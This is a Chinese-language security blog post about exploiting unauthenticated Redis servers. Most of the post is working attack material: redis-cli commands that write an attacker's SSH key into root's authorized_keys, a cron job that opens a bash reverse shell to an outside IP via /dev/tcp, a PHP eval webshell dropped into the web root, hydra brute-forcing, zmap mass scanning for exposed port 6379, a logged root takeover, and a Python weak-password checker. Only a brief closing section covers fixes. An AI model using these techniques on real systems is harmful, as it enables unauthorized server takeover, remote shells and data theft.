<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="default">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.3">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.3" color="#222">





  <meta name="keywords" content="m3lon">










<meta name="description" content="Reids介绍Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。 漏洞介绍Reids因配置不当可导致未授权访问漏洞，攻击者无需认证即可登陆Redis内部数据，可导致敏感信息泄漏；在特定条件下，Redis服务以root身份运行，攻击者可通过Reids命令给Root用户写入SSH公钥，直接通过SSH登陆受害服务器，">
<meta property="og:type" content="article">
<meta property="og:title" content="Redis未授权访问">
<meta property="og:url" content="http://m3lon.github.io/2019/02/27/redis未授权访问/index.html">
<meta property="og:site_name" content="m3lon">
<meta property="og:description" content="Reids介绍Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。 漏洞介绍Reids因配置不当可导致未授权访问漏洞，攻击者无需认证即可登陆Redis内部数据，可导致敏感信息泄漏；在特定条件下，Redis服务以root身份运行，攻击者可通过Reids命令给Root用户写入SSH公钥，直接通过SSH登陆受害服务器，">
<meta property="og:locale" content="default">
<meta property="og:image" content="http://m3lon.github.io/2019/02/27/redis未授权访问/1.jpg">
<meta property="og:updated_time" content="2019-04-28T08:45:51.823Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Redis未授权访问">
<meta name="twitter:description" content="Reids介绍Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。 漏洞介绍Reids因配置不当可导致未授权访问漏洞，攻击者无需认证即可登陆Redis内部数据，可导致敏感信息泄漏；在特定条件下，Redis服务以root身份运行，攻击者可通过Reids命令给Root用户写入SSH公钥，直接通过SSH登陆受害服务器，">
<meta name="twitter:image" content="http://m3lon.github.io/2019/02/27/redis未授权访问/1.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.3',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://m3lon.github.io/2019/02/27/redis未授权访问/">





  <title>Redis未授权访问 | m3lon</title>
  




<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
            (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
          m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-113184689-1', 'auto');
  ga('send', 'pageview');
</script>





  <style>
	blockquote {
	  color: #888;
	  background-color: #eae6f3;
	  border-left: 1rem solid #5236a0;
	  padding: 0 1.5rem;
	  position: relative;
	  font-family: 'Roboto', sans-serif;
	}

	blockquote:before,
	blockquote:after {
	  color: #392570;
	  font-size: 2.5rem;
	  position: absolute;
	  line-height: 2.5rem;
	}

	blockquote:before {
	  content: "\201C";
	  left: -1rem;
	  top: 0;
	}

	blockquote:after {
	  content: "\201D";
	  right: 0;
	  bottom: -1rem;
	}
</style>
</head>


<body itemscope="" itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">m3lon</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            Categories
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://m3lon.github.io/2019/02/27/redis未授权访问/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="m3lon">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/UMR.png">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="m3lon">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Redis未授权访问</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-02-27T17:24:17+08:00">
                2019-02-27
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="Reids介绍"><a href="#Reids介绍" class="headerlink" title="Reids介绍"></a>Reids介绍</h3><p>Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。</p>
<h3 id="漏洞介绍"><a href="#漏洞介绍" class="headerlink" title="漏洞介绍"></a>漏洞介绍</h3><p>Reids因配置不当可导致未授权访问漏洞，攻击者无需认证即可登陆Redis内部数据，可导致敏感信息泄漏；在特定条件下，Redis服务以root身份运行，攻击者可通过Reids命令给Root用户写入SSH公钥，直接通过SSH登陆受害服务器，导致服务器权限被获取、文件泄漏、重要数据删除、加密勒索等事件发生，严重威胁业务正常服务。</p>
<h3 id="漏洞原因"><a href="#漏洞原因" class="headerlink" title="漏洞原因"></a>漏洞原因</h3><p>Redis 默认情况下，会绑定在 0.0.0.0:6379，这样将会将 Redis 服务暴露到公网上，如果在没有开启认证的情况下，可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法，可以成功在 Redis 服务器上写入公钥，进而可以使用对应私钥直接登录目标服务器。</p>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><h4 id="获取敏感信息"><a href="#获取敏感信息" class="headerlink" title="获取敏感信息"></a>获取敏感信息</h4><p>Nmap扫描后发现主机的6379端口对外开放，就可以用本地Redis远程连接服务器（redis在开放往外网的情况下(默认配置是bind 127.0.0.1，只允许本地访问，如果配置了其他网卡地址那么就可以网络访问)，默认配置下是空口令，端口为6379）连接后可以获取Redis敏感数据。<br><img src="1.jpg" alt=""></p>
<h4 id="写入SSH公钥，获取操作系统权限"><a href="#写入SSH公钥，获取操作系统权限" class="headerlink" title="写入SSH公钥，获取操作系统权限"></a>写入SSH公钥，获取操作系统权限</h4><ol>
<li><p>在攻击方生成一对 ssh key (如果已经生成过则可跳过此步骤)  </p>
 <figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$ </span>ssh-keygen -t rsa</span><br></pre></td></tr></table></figure>
<p>默认情况下，生成后在用户的家目录下的 .ssh 目录下</p>
</li>
<li><p>将生成的公钥的值写入目标服务器</p>
 <figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ (echo -e <span class="string">"<span class="subst">\n</span><span class="subst">\n</span>"</span>; cat ~/.ssh/id_rsa.pub; echo -e <span class="string">"<span class="subst">\n</span><span class="subst">\n</span>"</span>) &gt; /tmp/foo.txt</span><br><span class="line">$ cat /tmp/foo.txt | redis-cli -h <span class="number">192.168</span><span class="number">.1</span><span class="number">.100</span> -p <span class="number">6379</span> -x set crackit</span><br></pre></td></tr></table></figure>
<blockquote>
<p>加上 <code>\n\n</code> 是为了不破坏 ssh public key<br>crackit 是设置的 key，可随意指定</p>
</blockquote>
</li>
<li><p>连接目标</p>
 <figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">$ redis-cli -h 192.168.1.100 -p 6379</span><br><span class="line">192.168.1.100:6379&gt;<span class="built_in"> config </span><span class="builtin-name">set</span> dir /root/.ssh/</span><br><span class="line">OK</span><br><span class="line">192.168.1.100:6379&gt;<span class="built_in"> config </span><span class="builtin-name">get</span> dir</span><br><span class="line">1) <span class="string">"dir"</span></span><br><span class="line">2) <span class="string">"/root/.ssh"</span></span><br><span class="line">192.168.1.100:6379&gt;<span class="built_in"> config </span><span class="builtin-name">set</span> dbfilename <span class="string">"authorized_keys"</span></span><br><span class="line">OK</span><br><span class="line">192.168.1.100:6379&gt; save</span><br><span class="line">OK</span><br></pre></td></tr></table></figure>
<p> 将目录设置为 /root/.ssh/ 目录后，再将备份文件名设置为 <code>authorized_keys</code>，通过 save 指令即可写入文件。</p>
</li>
<li><p>通过 ssh 连接目标</p>
 <figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$ </span>ssh root<span class="variable">@192</span>.<span class="number">168.1</span>.<span class="number">100</span> -i ~<span class="regexp">/.ssh/id</span>_rsa</span><br></pre></td></tr></table></figure>
<blockquote>
<p>默认会使用 <code>id_rsa</code> 如果改过文件名则可以用 -i 参数来指定。</p>
</blockquote>
</li>
</ol>
<h4 id="利用crontab反弹shell"><a href="#利用crontab反弹shell" class="headerlink" title="利用crontab反弹shell"></a>利用crontab反弹shell</h4><ol>
<li>在攻击者服务器上监听一个端口（任意端口):nc -lvnp 4444</li>
<li>攻击详情<br> 连接redis，写入反弹shell <figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">redis-cli -h 192.168.152.128</span><br><span class="line"><span class="builtin-name">set</span> xxx <span class="string">"\n\n*/1 * * * * /bin/bash -i&gt;&amp;/dev/tcp/192.168.152.129/4444 0&gt;&amp;1\n\n"</span></span><br><span class="line">config <span class="builtin-name">set</span> dir /var/spool/cron</span><br><span class="line">config <span class="builtin-name">set</span> dbfilename root</span><br><span class="line">save</span><br></pre></td></tr></table></figure>
</li>
</ol>
<p>1分钟后客户端这边收到centos的反弹shell</p>
<h4 id="获取web服务的webshell"><a href="#获取web服务的webshell" class="headerlink" title="获取web服务的webshell"></a>获取web服务的webshell</h4><p>当Redis权限不高，服务器开着web服务，已知web服务器绝对路径的情况下，且Reids在网站根目录下有写权限，可以通过Redis写入webshell<br><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">redis-cli -h 192.168.152.128</span><br><span class="line">config <span class="builtin-name">set</span> dir /var/www/html</span><br><span class="line"><span class="builtin-name">set</span> xxx <span class="string">"\n\n\n&lt;?php @eval(<span class="variable">$_POST</span>['c']);?&gt;\n\n\n"</span></span><br><span class="line">config <span class="builtin-name">set</span> dbfilename webshell.php</span><br><span class="line">save</span><br></pre></td></tr></table></figure></p>
<h3 id="利用hydra暴力破解redis的密码"><a href="#利用hydra暴力破解redis的密码" class="headerlink" title="利用hydra暴力破解redis的密码"></a>利用hydra暴力破解redis的密码</h3><p>使用hydra工具可以对redis进行暴力破解<br>hydra -P passwd.txt redis://漏洞服务器IP  </p>
<h3 id="案例：zmap测试Redis未授权"><a href="#案例：zmap测试Redis未授权" class="headerlink" title="案例：zmap测试Redis未授权"></a>案例：zmap测试Redis未授权</h3><p>先上 zmap 这个大杀器大范围找安装 redis 服务的机器，aaa.bbb.0.0 是计划扫描的网络。<br><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">zmap -B 1M -p 6379 aaa.bbb.0.0/16 -o results.csv</span><br></pre></td></tr></table></figure></p>
<p>然后根据 results.csv 的结果来逐个排查，注意要能 ssh 登录的。<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat results.csv | xargs nmap -p 22 <span class="comment"># xargs将列表分段传给其他命令，避免参数列表过长问题</span></span><br></pre></td></tr></table></figure></p>
<p>最后找一个隐蔽环境，开始干活，aaa.bbb.ccc.ddd 是目标地址：<br><figure class="highlight vbnet"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line">root@ab871b39330f:~<span class="meta"># ssh-keygen -t rsa</span></span><br><span class="line">Generating <span class="keyword">public</span>/<span class="keyword">private</span> rsa <span class="keyword">key</span> pair.</span><br><span class="line">Enter file <span class="keyword">in</span> which <span class="keyword">to</span> save the <span class="keyword">key</span> (/root/.ssh/id_rsa): </span><br><span class="line">Created directory <span class="comment">'/root/.ssh'.</span></span><br><span class="line">Enter passphrase (empty <span class="keyword">for</span> no passphrase): </span><br><span class="line">Enter same passphrase again: </span><br><span class="line">Your identification has been saved <span class="keyword">in</span> /root/.ssh/id_rsa.</span><br><span class="line">Your <span class="keyword">public</span> <span class="keyword">key</span> has been saved <span class="keyword">in</span> /root/.ssh/id_rsa.pub.</span><br><span class="line">The <span class="keyword">key</span> fingerprint <span class="keyword">is</span>:</span><br><span class="line">f8:d1:b2:bc:d9:<span class="number">13</span>:<span class="number">13</span>:<span class="number">3</span>d:de:<span class="number">6</span>d:<span class="number">6</span>e:<span class="number">27</span>:bf:<span class="number">28</span>:<span class="number">28</span>:<span class="number">72</span> root@ab871b39330f</span><br><span class="line">The <span class="keyword">key</span><span class="comment">'s randomart image is:</span></span><br><span class="line">+---[RSA <span class="number">2048</span>]----+</span><br><span class="line">|                 |</span><br><span class="line">|                 |</span><br><span class="line">|           .     |</span><br><span class="line">|       . .. o    |</span><br><span class="line">|      . S .o o . |</span><br><span class="line">|       o +o . . o|</span><br><span class="line">|        + .o   o |</span><br><span class="line">|     . E =..  o +|</span><br><span class="line">|      o + .... =+|</span><br><span class="line">+-----------------+</span><br><span class="line">root@ab871b39330f:~<span class="meta"># (echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") | redis-cli -h aaa.bbb.ccc.ddd -x set crackit</span></span><br><span class="line">OK</span><br><span class="line">root@ab871b39330f:~<span class="meta"># redis-cli -h aaa.bbb.ccc.ddd</span></span><br><span class="line">aaa.bbb.ccc.ddd:<span class="number">6379</span>&gt; config <span class="keyword">set</span> dir /root/.ssh/ <span class="meta"># 设置数据库目录未/root/.ssh</span></span><br><span class="line">OK</span><br><span class="line">aaa.bbb.ccc.ddd:<span class="number">6379</span>&gt; config <span class="keyword">get</span> dir</span><br><span class="line"><span class="number">1</span>) <span class="string">"dir"</span></span><br><span class="line"><span class="number">2</span>) <span class="string">"/root/.ssh"</span></span><br><span class="line">aaa.bbb.ccc.ddd:<span class="number">6379</span>&gt; config <span class="keyword">set</span> dbfilename <span class="string">"authorized_keys"</span> <span class="meta"># 设置数据库文件为authorized_keys</span></span><br><span class="line">OK</span><br><span class="line">aaa.bbb.ccc.ddd:<span class="number">6379</span>&gt; save</span><br><span class="line">OK</span><br><span class="line">aaa.bbb.ccc.ddd:<span class="number">6379</span>&gt; <span class="keyword">exit</span></span><br><span class="line">root@ab871b39330f:~<span class="meta"># ssh root@aaa.bbb.ccc.ddd</span></span><br><span class="line">The authenticity <span class="keyword">of</span> host <span class="comment">'aaa.bbb.ccc.ddd (aaa.bbb.ccc.ddd)' can't be established.</span></span><br><span class="line">RSA <span class="keyword">key</span> fingerprint <span class="keyword">is</span> <span class="number">0</span>c:<span class="number">9</span>d:<span class="number">60</span>:e6:<span class="number">24</span>:<span class="number">51</span>:<span class="number">07</span>:<span class="number">4</span>d:<span class="number">93</span>:<span class="number">0</span>f:f3:<span class="number">4</span>e:cb:<span class="number">12</span>:ae:<span class="number">43.</span></span><br><span class="line">Are you sure you want <span class="keyword">to</span> <span class="keyword">continue</span> connecting (yes/no)? yes</span><br><span class="line">Warning: Permanently added <span class="comment">'aaa.bbb.ccc.ddd' (RSA) to the list of known hosts.</span></span><br><span class="line">Last login: Tue Sep <span class="number">29</span> <span class="number">15</span>:<span class="number">20</span>:<span class="number">10</span> <span class="number">2015</span> <span class="keyword">from</span> <span class="number">202.115</span><span class="number">.16</span><span class="number">.136</span></span><br><span class="line">[root@mscopyright1 ~]<span class="meta"># pwd</span></span><br><span class="line">/root</span><br></pre></td></tr></table></figure></p>
<h3 id="python脚本自动化测试"><a href="#python脚本自动化测试" class="headerlink" title="python脚本自动化测试"></a>python脚本自动化测试</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#! /usr/bin/env python</span></span><br><span class="line"><span class="comment"># _*_  coding:utf-8 _*_</span></span><br><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">PASSWORD_DIC=[<span class="string">'redis'</span>,<span class="string">'root'</span>,<span class="string">'oracle'</span>,<span class="string">'password'</span>,<span class="string">'p@aaw0rd'</span>,<span class="string">'abc123!'</span>,<span class="string">'123456'</span>,<span class="string">'admin'</span>]</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">check</span><span class="params">(ip, port, timeout)</span>:</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        socket.setdefaulttimeout(timeout)</span><br><span class="line">        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line">        s.connect((ip, int(port)))</span><br><span class="line">        s.send(<span class="string">"INFO\r\n"</span>)</span><br><span class="line">        result = s.recv(<span class="number">1024</span>)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">"redis_version"</span> <span class="keyword">in</span> result:</span><br><span class="line">            <span class="keyword">return</span> <span class="string">u"未授权访问"</span></span><br><span class="line">        <span class="keyword">elif</span> <span class="string">"Authentication"</span> <span class="keyword">in</span> result:</span><br><span class="line">            <span class="keyword">for</span> pass_ <span class="keyword">in</span> PASSWORD_DIC:</span><br><span class="line">                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line">                s.connect((ip, int(port)))</span><br><span class="line">                s.send(<span class="string">"AUTH %s\r\n"</span> %(pass_))</span><br><span class="line">                result = s.recv(<span class="number">1024</span>)</span><br><span class="line">                <span class="keyword">if</span> <span class="string">'+OK'</span> <span class="keyword">in</span> result:</span><br><span class="line">                    <span class="keyword">return</span> <span class="string">u"存在弱口令，密码：%s"</span> % (pass_)</span><br><span class="line">    <span class="keyword">except</span> Exception, e:</span><br><span class="line">        <span class="keyword">pass</span></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    ip=sys.argv[<span class="number">1</span>]</span><br><span class="line">    port=sys.argv[<span class="number">2</span>]</span><br><span class="line">    <span class="keyword">print</span> check(ip,port, timeout=<span class="number">10</span>)</span><br></pre></td></tr></table></figure>
<h3 id="使用搜索引擎查找易受攻击的Redis服务器"><a href="#使用搜索引擎查找易受攻击的Redis服务器" class="headerlink" title="使用搜索引擎查找易受攻击的Redis服务器"></a>使用搜索引擎查找易受攻击的Redis服务器</h3><p>我们将使用Shodan来搜索具有Redis特征的服务器。</p>
<p>我们通过Redis的默认端口进行简单搜索。</p>
<h3 id="修复方案"><a href="#修复方案" class="headerlink" title="修复方案"></a>修复方案</h3><ul>
<li>绑定IP的方式进行控制，redis.conf中的bind 127.0.0.1 注释去掉</li>
<li>设置密码来提供远程登陆 requirepass yourpassword</li>
</ul>

      
    </div>
    
    
    

    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>坚持原创技术分享，您的支持将鼓励我继续创作！</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>Donate</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/images/wechatpay.jpg" alt="m3lon WeChat Pay">
        <p>WeChat Pay</p>
      </div>
    

    

    

  </div>
</div>

      </div>
    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/02/21/MetInfo-6-1-3-XSS漏洞分析-CVE-2018-19050、CVE-2018-19051/" rel="next" title="MetInfo 6.1.3 XSS漏洞分析">
                <i class="fa fa-chevron-left"></i> MetInfo 6.1.3 XSS漏洞分析
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/03/01/docker-常用命令备份/" rel="prev" title="Docker 常用命令备份">
                Docker 常用命令备份 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="lv-container" data-id="city" data-uid="MTAyMC8zMzYxOC8xMDE3Mw=="></div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/UMR.png" alt="m3lon">
            
              <p class="site-author-name" itemprop="name">m3lon</p>
              <p class="site-description motion-element" itemprop="description">萌新一枚</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">28</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/CTF/index.html">
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          <div class="links-of-author motion-element">
            
          </div>

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://lambdax.me/" title="Lambdax" target="_blank">Lambdax</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.51cto.com/skytina" title="skytina" target="_blank">skytina</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://idoge.cc/" title="Dik1s" target="_blank">Dik1s</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.cnblogs.com/iamstudy" title="l3m0n" target="_blank">l3m0n</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://o0xmuhe.github.io/" title="0xmuhe" target="_blank">0xmuhe</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://k1n9.me/" title="k1n9" target="_blank">k1n9</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://stone.moe/" title="StoneMoe" target="_blank">StoneMoe</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://pi4net.com/" title="pi4net" target="_blank">pi4net</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#Reids介绍"><span class="nav-number">1.</span> <span class="nav-text">Reids介绍</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞介绍"><span class="nav-number">2.</span> <span class="nav-text">漏洞介绍</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞原因"><span class="nav-number">3.</span> <span class="nav-text">漏洞原因</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞利用"><span class="nav-number">4.</span> <span class="nav-text">漏洞利用</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#获取敏感信息"><span class="nav-number">4.1.</span> <span class="nav-text">获取敏感信息</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#写入SSH公钥，获取操作系统权限"><span class="nav-number">4.2.</span> <span class="nav-text">写入SSH公钥，获取操作系统权限</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#利用crontab反弹shell"><span class="nav-number">4.3.</span> <span class="nav-text">利用crontab反弹shell</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#获取web服务的webshell"><span class="nav-number">4.4.</span> <span class="nav-text">获取web服务的webshell</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#利用hydra暴力破解redis的密码"><span class="nav-number">5.</span> <span 